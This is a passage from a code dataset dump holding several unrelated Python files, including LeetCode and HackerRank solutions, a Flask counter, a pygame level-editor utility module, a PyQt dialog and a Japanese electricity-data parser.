resized = cv2.cvtColor(resized, cv2.COLOR_GRAY2RGB)\n\n output_image[0:r_h, pic_indx * (r_w + margin) : pic_indx * (r_w + margin) + r_w,:] = resized\n return output_image\n\ndef text_on_image(original_image, curvature=\"\", offset=\"\"):\n h, w = original_image.shape[0:2]\n\n text = \"Curvature: {0:4.1f} m Offset: {1:2.2f} m\".format(curvature, offset)\n \n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(original_image, text, (10, int(h*0.4)), font, 1, (255,255,255), 2, cv2.LINE_AA)\n return original_image\n\n","repo_name":"philippmarcus/CarND-Advanced-Lane-Lines","sub_path":"src/lanelines/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37216715381","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n 
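np.exp in the softmax above overflows once scores grow large (softmax(scores * 1000) would already return nan). Subtracting the column maximum first is the usual stabilisation and changes nothing mathematically, since softmax is shift-invariant:

import numpy as np

def softmax_stable(x):
    shifted = x - np.max(x, axis=0)  # largest exponent becomes exp(0) = 1
    expx = np.exp(shifted)
    return expx / expx.sum(axis=0)

scores = np.array([3.0, 1.0, 0.2])
assert np.allclose(softmax_stable(scores).sum(axis=0), 1.0)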
def plusOne(self, head: 'ListNode') -> 'ListNode':\n def helper(node):\n beforeAdd = node.val\n if node.next == None:\n node.val += 1\n else:\n node.val += helper(node.next)\n node.val %= 10\n return 1 if node.val == 0 and beforeAdd == 9 else 0 # this is the carry over digit\n\n if helper(head) == 1:\n newHead = ListNode(1)\n newHead.next = head\n return newHead\n else:\n return head\n\n\n","repo_name":"renjieliu/leetcode","sub_path":"0001_0599/369.py","file_name":"369.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"31874205741","text":"#!/usr/bin/python\n\n'''\nIssue #120\nAuthor: Ahmed\n\nUsage:\npython addspacerandrepeat.py\n\nReads in the contents of spacerdatabase.txt and DRdatabase.txt and imports their\ncontents to the Spacer and Repeat tables.\n\nA future iteration of this script could remove the hardcoded file paths and take in \ninput files as arguments.\n'''\n\n\nimport os\nimport sys\nfrom Bio import SeqIO\n\nspacerinput = '../data/spacerdatabase.txt'\nrepeatinput = '../data/DRdatabase.txt'\n\ndef populate_spacers():\n\tspacerfile = SeqIO.parse(spacerinput, 'fasta') \n\tfor entry in spacerfile: # that one file in data/\n\t\tspacer = entry.seq\n\t\tspacer, created = Spacer.objects.get_or_create(sequence = spacer)\n\t\t\ndef populate_repeats():\n\trepeatfile = SeqIO.parse(repeatinput, 'fasta')\n\tfor entry in repeatfile:\n\t\trepeat = entry.seq\n\t\trepeat, created = Repeat.objects.get_or_create(sequence = repeat)\n\nif __name__ == '__main__':\n\tprint(\"Initializing spacer table population.\")\n\timport os\n\timport django\n\tos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"phageAPI.settings\")\n\tdjango.setup()\n\tfrom restapi.models import Spacer, Repeat\n\tpopulate_spacers()\n\tprint(\"Spacer table population complete.\")\n\tprint(\"Initializing repeat table population.\")\n\tpopulate_repeats() \n\tprint(\"Repeat table population complete.\")\n\n","repo_name":"QuLogic/phageParser","sub_path":"phageAPI/addspacerandrepeat.py","file_name":"addspacerandrepeat.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"18167353860","text":"from flask import Flask, render_template, redirect, request, session\napp = Flask(__name__)\n\napp.secret_key = 'i have no enemies'\n\n@app.route('/')\ndef index():\n if 'key' in session:\n print('key exists')\n session['key'] += 1\n print(session['key'])\n else: \n session['key'] = 1\n print(session['key'])\n return render_template('index.html')\n\n@app.route('/add', methods=['POST'])\ndef loop():\n session['key'] += 1\n return redirect('/')\n\n@app.route('/destroy_session', methods = ['POST'])\ndef eat_cookies():\n session.clear()\n return redirect('/')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"LJR41/core_counter","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2915992675","text":"# problem 3\r\ndef neighbor_sum(a_list):\r\n n = len(a_list)\r\n # create a new list where the neighbors of each element are added to it\r\n b_list = [0 for i in range(n)]\r\n for i in range(0, n):\r\n # when there's number on the leftside\r\n if i - 1 >= 0: \r\n b_list[i] += a_list[i - 1]\r\n # when there's number on the rightside \r\n if i + 1 < n: \r\n b_list[i] += a_list[i + 1]\r\n # add itself all 
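A quick harness for the plusOne solution above: the recursion returns the carry, so 1->9->9 must come back as 2->0->0 and an all-nines list must grow a new head. ListNode and Solution are the classes from the snippet; from_list/to_list are illustrative helpers:

def from_list(values):
    head = node = ListNode(values[0])
    for v in values[1:]:
        node.next = ListNode(v)
        node = node.next
    return head

def to_list(head):
    out = []
    while head:
        out.append(head.val)
        head = head.next
    return out

assert to_list(Solution().plusOne(from_list([1, 9, 9]))) == [2, 0, 0]
assert to_list(Solution().plusOne(from_list([9, 9]))) == [1, 0, 0]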
the time \r\n b_list[i] += a_list[i] \r\n return b_list\r\n\r\n\r\n# problem 4\r\ndef cal(e):\r\n # all the tax rate\r\n taxRate = [0.1, 0.12, 0.22, 0.24, 0.32, 0.35, 0.37]\r\n # all thresholds corresponded with the tax rate\r\n Single = [0.0, 9950.0, 40525.0, 86375.0, 164925.0, 209425.0, 5236600.0]\r\n n = len(e)\r\n total = [0 for i in range(n)]\r\n\r\n for j in range(n): \r\n # for adding paid tax in every range\r\n add_paid = 0.0 \r\n # in 2021, income $12550 is tax free\r\n if e[j] <= 12550:\r\n continue\r\n # start to calculate income part which need be taxed\r\n e[j] -= 12550\r\n # go through 7 tax rate ranges\r\n for i in range(7):\r\n # when supposed tax part is less or equal to 0, meaning no income part need to be taxed\r\n if e[j] <= 0:\r\n break\r\n if i != 6:\r\n # the most supposed tax pay from current tax range\r\n diff = Single[i + 1] - Single[i]\r\n # how much income is supposed to be calculated from current tax rate range\r\n be_taxed = min(diff, e[j])\r\n # in case it will come negative numbers for complete logic, although it seems unnecessary\r\n be_taxed = max(0, be_taxed)\r\n # calculate how much tax should be paid from current range\r\n add_paid += taxRate[i] * be_taxed\r\n # remove already taxed income part from total income\r\n e[j] -= be_taxed\r\n else:\r\n # when income over $523601\r\n be_taxed = e[j]\r\n be_taxed = max(0, be_taxed)\r\n add_paid += taxRate[i] * be_taxed\r\n total[j] = add_paid\r\n return total\r\n\r\n\r\ndef get_income_tax(e):\r\n return cal(e)\r\n\r\n\r\n# problem 5\r\nclass SetSuite:\r\n \r\n def __init__(self, list_of_lists):\r\n self._list = []\r\n for a_list in list_of_lists:\r\n self.add_set(a_list)\r\n\r\n # adds a new set to the internal list of sets\r\n def add_set(self, new_List):\r\n self._list.append(list(set(new_List)))\r\n\r\n # returns the internal list of sets\r\n def get_sets(self):\r\n return self._list\r\n\r\n # returns the union set of all sets\r\n def union_all(self):\r\n u_set = set()\r\n for a_set in self._list:\r\n u_set = u_set.union(set(a_set))\r\n return list(u_set)\r\n\r\n # returns the intersection set of all sets\r\n def intersection_all(self):\r\n if len(self._list) == 0:\r\n return list(set())\r\n\r\n i_set = set(self._list[0])\r\n for a_set in self._list[1:]:\r\n i_set = i_set.intersection(a_set)\r\n return list(i_set)\r\n\r\n\r\n\r\n\r\n# problem 6\r\ndef pascal(row):\r\n # pattern as below\r\n # 1\r\n # 1 1\r\n # 1 2 1\r\n # 1 3 3 1\r\n # every number is the sum of upper one and left upper number, no existence is 0\r\n tri = [[0 for i in range(row + 10)] for i in range(row + 10)]\r\n tri[0][0] = 1\r\n for i in range(1, row + 1):\r\n tri[i][0] = 1\r\n for j in range(1, row + 1):\r\n tri[i][j] = tri[i - 1][j - 1] + tri[i - 1][j]\r\n return tri[row][:row + 1]\r\n\r\n\r\n# problem 7\r\ndef perfect_power(num_1, num_2):\r\n power_num = num_1\r\n # corner case\r\n if num_1 == num_2:\r\n return True\r\n # keep multiple num_1 until they are equal\r\n while num_1 < num_2:\r\n num_1 *= power_num\r\n if num_1 == num_2:\r\n return True\r\n return False\r\n\r\n\r\n# extra credit\r\n\r\ndef change(num, l, r, base, cur):\r\n # left and right are the range of num, cur is some power of base\r\n if l > r:\r\n return 0\r\n # turn the last digit of num into integer\r\n e = int(num[r])\r\n # value of current position multiple cur, then add value from left to (right-1) of num\r\n return cur * e + change(num, l, r - 1, base, cur * base)\r\n\r\n\r\ndef convert_to_10(num, base):\r\n l = 0\r\n r = len(num) - 1\r\n for i in range(r + 
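perfect_power above loops forever when num_1 == 1 and num_2 > 1 (1 * 1 never grows), and a zero base has the same problem. A guarded sketch of the same repeated-multiplication idea; perfect_power_safe is an illustrative name and, like the original, it only considers positive bases:

def perfect_power_safe(base: int, target: int) -> bool:
    if base == target:
        return True
    if base <= 1:  # 0 and 1 can never reach a larger target; negatives excluded
        return False
    value = base
    while value < target:
        value *= base
    return value == target

assert perfect_power_safe(2, 8)
assert not perfect_power_safe(1, 5)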
1):\r\n if int(num[i]) >= base:\r\n return \"Invalid Number\"\r\n return change(num, l, r, base, 1)\r\n","repo_name":"qiyuanhuadelaide/Python_Code","sub_path":"hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70433215413","text":"from termcolor import colored\nfrom pyfiglet import figlet_format\nfrom random import choice\nimport requests\n\n\ndef print_ascii_message(msg):\n color = 'magenta'\n ascii_art = figlet_format(msg)\n colored_ascii = colored(ascii_art, color=color)\n print(colored_ascii)\n\n\ndef get_jokes(jokes):\n url = 'https://icanhazdadjoke.com/search'\n response = requests.get(url, headers={'Accept': 'application/json'},\n params={'term': jokes})\n data = response.json()\n return data['results']\n\n\ndef show_jokes(jokes, keyword):\n if len(jokes) > 1:\n print(f'I\\'ve got {len(jokes)} jokes about {keyword}. Here\\'s one: ')\n show = choice(jokes)\n print(show['joke'])\n elif kidding == 1:\n print(f'I\\'ve got 1 jokes about {keyword}. Here it is: ')\n print(jokes['joke'])\n else:\n print(f'Sorry, i don\\'t have any jokes about {keyword}')\n\n\nprint_ascii_message('Dad Joke 3000')\njokes = input('Let me tell you a joke! Give me a topic: ')\nkidding = get_jokes(jokes)\nshow_jokes(kidding, jokes)\n","repo_name":"yanoandri/python-scripts","sub_path":"scripts/dad_jokes/dad.py","file_name":"dad.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27603513403","text":"'''\nWrite a script that demonstrates a try/except/else.\n\n'''\n\nlist1 = [1,2,3,4,5,6,7,8,9]\nlist2 = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\", \"i\", \"j\"]\nlists = [list1, list2]\n\ndef trying_if_out(a_list):\n\n try:\n a = a_list[9]\n\n except IndexError:\n print(a_list[0])\n\n else:\n print(a)\n\n\n\nfor l in lists:\n trying_if_out(l)\n\n","repo_name":"LuckyLub/python-onsite","sub_path":"week_03/02_exception_handling/03_else.py","file_name":"03_else.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15176732914","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\nGiven a string, remove characters until the string is made up of any two alternating characters. \nWhen you choose a character to remove, all instances of that character must be removed. 
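show_jokes above has two small bugs: `elif kidding == 1` compares the joke list itself (via the global, not the parameter) to the integer 1, so the branch never runs, and if it did, `jokes['joke']` would index a list with a string. A corrected sketch of the same function:

from random import choice

def show_jokes(jokes, keyword):
    if len(jokes) > 1:
        print(f"I've got {len(jokes)} jokes about {keyword}. Here's one: ")
        print(choice(jokes)['joke'])
    elif len(jokes) == 1:
        print(f"I've got 1 joke about {keyword}. Here it is: ")
        print(jokes[0]['joke'])
    else:
        print(f"Sorry, i don't have any jokes about {keyword}")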
Determine \nthe longest string possible that contains just two alternating letters.\n\n\nFunction Description:\nComplete the alternate function below.\nalternate has the following parameters:\n\nINPUT:\n string s: a string\nOUTPUT:\n int: the length of the longest valid string, or if there are none\n \nLink to problem statement: \nhttps://www.hackerrank.com/challenges/two-characters/problem\n\"\"\"\n\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom collections import Counter\nfrom itertools import combinations\n\n\"\"\"\nComplete the 'alternate' function below.\nThe function is expected to return an INTEGER.\nThe function accepts STRING s as parameter.\n\nLink to problem statement:\nhttps://www.hackerrank.com/challenges/two-characters/problem\n\"\"\"\n\ndef alternate(s):\n \n # some edge cases\n if len(s)<2 or s[0]==s[1]:\n return 0\n elif len(s) == 2 and s[0]!=s[1]:\n return 2\n \n # create the combinations of letters to be removed from s\n letters = list(Counter(s).keys())\n letters_combinations_remove = combinations(letters,len(letters)-2)\n \n # resulting strings after removing the combination of letters from s\n two_characters_strings = []\n for combination in letters_combinations_remove:\n #print(combination)\n s_short = s\n for ch in combination:\n s_short = s_short.replace(ch,\"\")\n two_characters_strings.append(s_short)\n \n # create the list of strings with alternate characters only\n two_characters_strings_special = two_characters_strings.copy()\n for item in two_characters_strings: \n \n if item[0] == item[1]:\n two_characters_strings_special.remove(item)\n continue \n \n for index in range(len(item)-2):\n if item[index] != item[index+2]:\n two_characters_strings_special.remove(item)\n break\n if two_characters_strings_special:\n return len(max(two_characters_strings_special, key=len))\n else:\n return 0\n\n#if __name__ == '__main__':\n# fptr = open(os.environ['OUTPUT_PATH'], 'w')\n# l = int(input().strip())\n# s = input()\n# result = alternate(s)\n# fptr.write(str(result) + '\\n')\n# fptr.close()\n","repo_name":"akerimov/HACKER_RANK","sub_path":"TwoCharacters.py","file_name":"TwoCharacters.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23303704513","text":"import math\nimport os\nimport pickle\n\nimport pygame\n\nfrom data.scripts.level_generator.config import SMALL_SQUARE_SHAPE, VERTICAL_SHAPE, HORIZONTAL_SHAPE, BIG_SQUARE_SHAPE\nfrom level_creator.data.scripts.config import GRID_SIZE, NOTHING, BLOCK, NEXT_LINE, LEVEL_PATH, SMALL_LEFT_INDEX, \\\n SMALL_RIGHT_INDEX, SMALL_BOTTOM_INDEX, SMALL_TOP_INDEX, VERTICAL_TOP_INDEX, VERTICAL_BOTTOM_INDEX, \\\n VERTICAL_TOPLEFT_INDEX, VERTICAL_TOPRIGHT_INDEX, VERTICAL_BOTTOMRIGHT_INDEX, VERTICAL_BOTTOMLEFT_INDEX, \\\n HORIZONTAL_LEFT_INDEX, HORIZONTAL_RIGHT_INDEX, HORIZONTAL_TOPLEFT_INDEX, HORIZONTAL_TOPRIGHT_INDEX, \\\n HORIZONTAL_BOTTOMLEFT_INDEX, HORIZONTAL_BOTTOMRIGHT_INDEX, BIG_TOPLEFT_TOP_INDEX, BIG_TOPLEFT_LEFT_INDEX, \\\n BIG_TOPRIGHT_TOP_INDEX, BIG_TOPRIGHT_RIGHT_INDEX, BIG_BOTTOMLEFT_BOTTOM_INDEX, BIG_BOTTOMLEFT_LEFT_INDEX, \\\n BIG_BOTTOMRIGHT_BOTTOM_INDEX, BIG_BOTTOMRIGHT_RIGHT_INDEX\n\n\ndef read_f(path):\n f = open(path, 'r')\n dat = f.read()\n f.close()\n return dat\n\n\ndef write_f(path, dat):\n f = open(path, 'w')\n f.write(dat)\n f.close()\n\n\ndef load_image_dir(path, colorkey=(0, 0, 0)):\n images = {}\n for img_name in os.listdir(path):\n img = pygame.image.load(path + '/' 
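Once a candidate string is reduced to two distinct characters, validity just means no two adjacent characters are equal, so the index/index+2 comparison above can be replaced by a single pairwise scan; is_alternating is an illustrative helper:

def is_alternating(s: str) -> bool:
    return all(a != b for a, b in zip(s, s[1:]))

assert is_alternating('ababab')
assert not is_alternating('abba')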
+ img_name).convert()\n img.set_colorkey(colorkey)\n images[img_name.split('.')[0]] = img.copy()\n return images\n\n\ndef warp_surf(surface, mask, loc, shift):\n offset = [mask.get_width() // 2, mask.get_height() // 2]\n loc = [loc[0] - offset[0], loc[1] - offset[1]]\n subsurf = clip(surface, loc[0], loc[1], mask.get_width(), mask.get_height())\n mask.set_colorkey((255, 255, 255))\n subsurf.blit(mask, (0, 0))\n subsurf.set_colorkey((0, 0, 0))\n surface.blit(subsurf, (loc[0] + shift[0], loc[1] + shift[1]))\n\n\ndef swap_color(img, old_c, new_c):\n global e_colorkey\n img.set_colorkey(old_c)\n surf = img.copy()\n surf.fill(new_c)\n surf.blit(img, (0, 0))\n return surf\n\n\ndef clip(surf, x, y, x_size, y_size):\n handle_surf = surf.copy()\n clipR = pygame.Rect(x, y, x_size, y_size)\n handle_surf.set_clip(clipR)\n image = surf.subsurface(handle_surf.get_clip())\n return image.copy()\n\n\ndef rect_corners(points):\n point_1 = points[0]\n point_2 = points[1]\n out_1 = [min(point_1[0], point_2[0]), min(point_1[1], point_2[1])]\n out_2 = [max(point_1[0], point_2[0]), max(point_1[1], point_2[1])]\n return [out_1, out_2]\n\n\ndef corner_rect(points):\n points = rect_corners(points)\n r = pygame.Rect(points[0][0], points[0][1], points[1][0] - points[0][0], points[1][1] - points[0][1])\n return r\n\n\ndef points_between_2d(points):\n points = rect_corners(points)\n width = points[1][0] - points[0][0] + 1\n height = points[1][1] - points[0][1] + 1\n point_list = []\n for y in range(height):\n for x in range(width):\n point_list.append([points[0][0] + x, points[0][1] + y])\n return point_list\n\n\ndef angle_to(points):\n return math.atan2(points[1][1] - points[0][1], points[1][0] - points[0][0])\n\n\ndef horizontal_crop(loc_x, width, img):\n loc_x = int(loc_x)\n loc_x = loc_x % img.get_width()\n if loc_x + width <= img.get_width():\n return img.copy()\n else:\n left_sec = img.get_width() - loc_x\n right_sec = width - left_sec\n output_surf = pygame.Surface((width, img.get_height()))\n output_surf.blit(clip(img, loc_x, 0, left_sec, img.get_height()), (0, 0))\n output_surf.blit(clip(img, 0, 0, right_sec, img.get_height()), (left_sec, 0))\n colorkey = img.get_colorkey()\n output_surf.set_colorkey(colorkey)\n return output_surf\n\n\ndef bordering_tile_x(x):\n base_x = int(x / GRID_SIZE)\n return [base_x - 1, base_x, base_x + 1]\n\n\ndef blit_center(surf, surf2, pos):\n x = int(surf2.get_width() / 2)\n y = int(surf2.get_height() / 2)\n surf.blit(surf2, (pos[0] - x, pos[1] - y))\n\n\ndef get_center_pos(surf):\n return [int(surf.get_width() / 2), int(surf.get_height() / 2)]\n\n\ndef normalize(num, amt):\n if num > amt:\n num -= amt\n elif num < -amt:\n num += amt\n else:\n num = 0\n return num\n\n\ndef mouse_over(rect):\n if type(rect) == pygame.Rect:\n return rect.collidepoint(pygame.mouse.get_pos())\n else:\n return rect.get_rect().collidepoint(pygame.mouse.get_pos())\n\n\ndef level_to_string(level):\n level_list = []\n for i in range(level.level_window[1] // GRID_SIZE):\n y = i * GRID_SIZE + 1\n for j in range(level.level_window[0] // GRID_SIZE):\n x = j * GRID_SIZE + 1\n collided = False\n for block in level.level_list:\n if block.get_rect().collidepoint((x, y)) and not collided:\n collided = True\n level_list.append(block.type['letter'])\n if not collided:\n level_list.append(NOTHING)\n level_list.append(NEXT_LINE)\n level_string = ''.join(level_list)\n return {'string': level_string, 'shape': level.shape}\n\n\ndef level_to_pickle(level, name):\n level['doors'] = get_doors(level)\n print(level['doors'])\n 
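clip() above copies a region by combining set_clip() with subsurface(); for rectangles that stay inside the surface, pygame can do the same in one call. A sketch, with one behavioural difference to note: subsurface() raises ValueError on out-of-bounds rects, while the set_clip trick silently clamps them:

import pygame

def clip_simple(surf: pygame.Surface, x: int, y: int, w: int, h: int) -> pygame.Surface:
    return surf.subsurface(pygame.Rect(x, y, w, h)).copy()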
with open(LEVEL_PATH + name + '.pickle', 'wb') as file:\n pickle.dump(level, file)\n\n\ndef save_level(level, name):\n level_to_pickle(level_to_string(level), name)\n print(\"Level \" + name + \" saved.\\n\")\n\n\ndef get_doors(level):\n doors = {}\n if level['shape'] == SMALL_SQUARE_SHAPE:\n doors = {'top': False, 'bottom': False, 'left': False, 'right': False}\n if level['string'][SMALL_LEFT_INDEX] == NOTHING:\n doors['left'] = True\n if level['string'][SMALL_RIGHT_INDEX] == NOTHING:\n doors['right'] = True\n if level['string'][SMALL_BOTTOM_INDEX] == NOTHING:\n doors['bottom'] = True\n if level['string'][SMALL_TOP_INDEX] == NOTHING:\n doors['top'] = True\n elif level['shape'] == VERTICAL_SHAPE:\n doors = {'top': False, 'bottom': False, 'topleft': False, 'topright': False, 'bottomleft': False,\n 'bottomright': False}\n if level['string'][VERTICAL_TOP_INDEX] == NOTHING:\n doors['top'] = True\n if level['string'][VERTICAL_BOTTOM_INDEX] == NOTHING:\n doors['bottom'] = True\n if level['string'][VERTICAL_TOPLEFT_INDEX] == NOTHING:\n doors['topleft'] = True\n if level['string'][VERTICAL_TOPRIGHT_INDEX] == NOTHING:\n doors['topright'] = True\n if level['string'][VERTICAL_BOTTOMLEFT_INDEX] == NOTHING:\n doors['bottomleft'] = True\n if level['string'][VERTICAL_BOTTOMRIGHT_INDEX] == NOTHING:\n doors['bottomright'] = True\n elif level['shape'] == HORIZONTAL_SHAPE:\n doors = {'left': False, 'right': False, 'topleft': False, 'topright': False, 'bottomleft': False,\n 'bottomright': False}\n if level['string'][HORIZONTAL_LEFT_INDEX] == NOTHING:\n doors['left'] = True\n if level['string'][HORIZONTAL_RIGHT_INDEX] == NOTHING:\n doors['right'] = True\n if level['string'][HORIZONTAL_TOPLEFT_INDEX] == NOTHING:\n doors['topleft'] = True\n if level['string'][HORIZONTAL_TOPRIGHT_INDEX] == NOTHING:\n doors['topright'] = True\n if level['string'][HORIZONTAL_BOTTOMLEFT_INDEX] == NOTHING:\n doors['bottomleft'] = True\n if level['string'][HORIZONTAL_BOTTOMRIGHT_INDEX] == NOTHING:\n doors['bottomright'] = True\n elif level['shape'] == BIG_SQUARE_SHAPE:\n doors = {'topleft_top': False, 'topleft_left': False, 'bottomleft_bottom': False, 'bottomleft_left': False,\n 'topright_top': False,\n 'topright_right': False, 'bottomright_bottom': False, 'bottomright_right': False}\n if level['string'][BIG_TOPLEFT_TOP_INDEX] == NOTHING:\n doors['topleft_top'] = True\n if level['string'][BIG_TOPLEFT_LEFT_INDEX] == NOTHING:\n doors['topleft_left'] = True\n if level['string'][BIG_TOPRIGHT_TOP_INDEX] == NOTHING:\n doors['topright_top'] = True\n if level['string'][BIG_TOPRIGHT_RIGHT_INDEX] == NOTHING:\n doors['topright_right'] = True\n if level['string'][BIG_BOTTOMLEFT_BOTTOM_INDEX] == NOTHING:\n doors['bottomleft_bottom'] = True\n if level['string'][BIG_BOTTOMLEFT_LEFT_INDEX] == NOTHING:\n doors['bottomleft_left'] = True\n if level['string'][BIG_BOTTOMRIGHT_BOTTOM_INDEX] == NOTHING:\n doors['bottomright_bottom'] = True\n if level['string'][BIG_BOTTOMRIGHT_RIGHT_INDEX] == NOTHING:\n doors['bottomright_right'] = True\n return doors\n\n\ndef load_level(game):\n name = input(\"Input the level name :\\n\")\n try:\n with open(LEVEL_PATH + name + '.pickle', 'rb') as file:\n level = pickle.load(file)\n print(\"Loaded \" + name + \" level.\\n\")\n return game.active_scene.convert_to_level(level)\n except:\n print(\"No such file 
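load_level above catches every exception with a bare except, which also hides genuine bugs inside convert_to_level. A sketch that narrows the handler to the expected failure modes of the pickle round trip; load_level_dict is an illustrative name and level_path stands in for the LEVEL_PATH constant from the config import:

import pickle

def load_level_dict(name: str, level_path: str):
    try:
        with open(level_path + name + '.pickle', 'rb') as file:
            return pickle.load(file)
    except FileNotFoundError:
        print("No such file found.\n")
    except (pickle.UnpicklingError, EOFError):
        print("File exists but is not a valid level pickle.\n")
    return None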
found.\\n\")\n","repo_name":"MonkeyWaffle0/theDescent","sub_path":"level_creator/data/scripts/core_funcs.py","file_name":"core_funcs.py","file_ext":"py","file_size_in_byte":8921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42121860268","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QMessageBox\n\nclass Exp(QWidget):\n\n def __init__(self):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300, 300, 300, 200)\n self.setWindowTitle('Quit')\n self.show()\n\n def closeEvent(self, event):\n \"\"\"重新定义closeEvent\"\"\"\n reply = QMessageBox.question(self, 'Message', 'You sure to quit?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Exp()\n sys.exit(app.exec_())\n\n","repo_name":"YuanXianguo/Python-Project-ITC","sub_path":"GUI学习/00PyQt5学习笔记/05弹出对话框请求确认.py","file_name":"05弹出对话框请求确认.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9870282897","text":"#!/usr/bin/env python3\nimport re\nfrom datetime import datetime\nfrom logging import Logger, getLogger\n\n# The arrow library is used to handle datetimes\nimport arrow\n\n# The request library is used to fetch content through HTTP\nfrom bs4 import BeautifulSoup\nfrom requests import Session, get\n\nfrom parsers import occtonet\n\n\ndef fetch_production(\n zone_key: str = \"JP-KY\",\n session: Session | None = None,\n target_datetime: datetime | None = None,\n logger: Logger = getLogger(__name__),\n) -> dict | list:\n \"\"\"Requests the last known production mix (in MW) of a given zone.\"\"\"\n if target_datetime:\n raise NotImplementedError(\"This parser is not yet able to parse past dates\")\n data = {\n \"zoneKey\": zone_key,\n \"datetime\": None,\n \"production\": {\n \"biomass\": 0,\n \"coal\": 0,\n \"gas\": 0,\n \"hydro\": None,\n \"nuclear\": None,\n \"oil\": 0,\n \"solar\": None,\n \"wind\": None,\n \"geothermal\": None,\n \"unknown\": 0,\n },\n \"storage\": {},\n \"source\": \"www.kyuden.co.jp\",\n }\n # url for consumption and solar\n url = \"https://www.kyuden.co.jp/td_power_usages/pc.html\"\n r = get(url)\n r.encoding = \"utf-8\"\n html = r.text\n soup = BeautifulSoup(html, \"lxml\")\n # get hours, minutes\n ts = soup.find(\"p\", class_=\"puProgressNow__time\").get_text()\n hours = int(re.findall(r\"[\\d]+(?=時)\", ts)[0])\n minutes = int(re.findall(r\"(?<=時)[\\d]+(?=分)\", ts)[0])\n # get date\n ds = soup.find(\"div\", class_=\"puChangeGraph\")\n date = re.findall(r\"(?<=chart/chart)[\\d]+(?=.gif)\", str(ds))[0]\n # parse datetime\n dt = f\"{date[:4]}-{date[4:6]}-{date[6:]} {hours:02d}:{minutes:02d}\"\n dt = arrow.get(dt).replace(tzinfo=\"Asia/Tokyo\").datetime\n data[\"datetime\"] = dt\n # consumption\n cons = soup.find(\"p\", class_=\"puProgressNow__useAmount\").get_text()\n cons = re.findall(\n r\"(?<=使用量\\xa0)[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*(?:[eE][-+]?\\d+)?(?=万kW/)\",\n cons,\n )\n cons = cons[0].replace(\",\", \"\")\n # convert from 万kW to MW\n cons = float(cons) * 10\n # solar\n solar = soup.find(\"td\", class_=\"puProgressSun__num\").get_text()\n # convert from 万kW to MW\n solar = float(solar) * 10\n\n # add nuclear power plants\n # Sendai and Genkai\n url_s = \"\".join(\n [\n \"http://www.kyuden.co.jp/php/nuclear/sendai/rename.php?\",\n 
\"A=s_power.fdat&B=ncp_state.fdat&_=1520532401043\",\n ]\n )\n url_g = \"\".join(\n [\n \"http://www.kyuden.co.jp/php/nuclear/genkai/rename.php?\",\n \"A=g_power.fdat&B=ncp_state.fdat&_=1520532904073\",\n ]\n )\n sendai = get(url_s).text\n sendai = re.findall(\n r\"(?<=gouki=)[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*\" + r\"(?:[eE][-+]?\\d+)?(?=&)\",\n sendai,\n )\n genkai = get(url_g).text\n genkai = re.findall(\n r\"(?<=gouki=)[-+]?[.]?[\\d]+(?:,\\d\\d\\d)*[\\.]?\\d*\" + r\"(?:[eE][-+]?\\d+)?(?=&)\",\n genkai,\n )\n nuclear = 0\n for sendai_i in sendai:\n nuclear += float(sendai_i)\n for genkai_i in genkai:\n nuclear += float(genkai_i)\n # convert from 万kW to MW\n nuclear = nuclear * 10\n\n # add the exchange JP-CG->JP-KY\n exch_list = occtonet.fetch_exchange(\"JP-KY\", \"JP-CG\")\n # find the nearest exchanges in time to consumption timestamp\n nearest_exchanges = sorted(exch_list, key=lambda exch: abs(exch[\"datetime\"] - dt))\n # take the nearest exchange\n exch = nearest_exchanges[0]\n # check that consumption and exchange timestamps are within a 15 minute window\n if abs(dt - exch[\"datetime\"]).seconds <= 900:\n generation = cons - exch[\"netFlow\"]\n data[\"production\"][\"solar\"] = solar\n data[\"production\"][\"nuclear\"] = nuclear\n data[\"production\"][\"unknown\"] = generation - nuclear - solar\n\n return data\n else:\n return []\n\n\nif __name__ == \"__main__\":\n \"\"\"Main method, never used by the Electricity Map backend, but handy for testing.\"\"\"\n\n print(\"fetch_production() ->\")\n 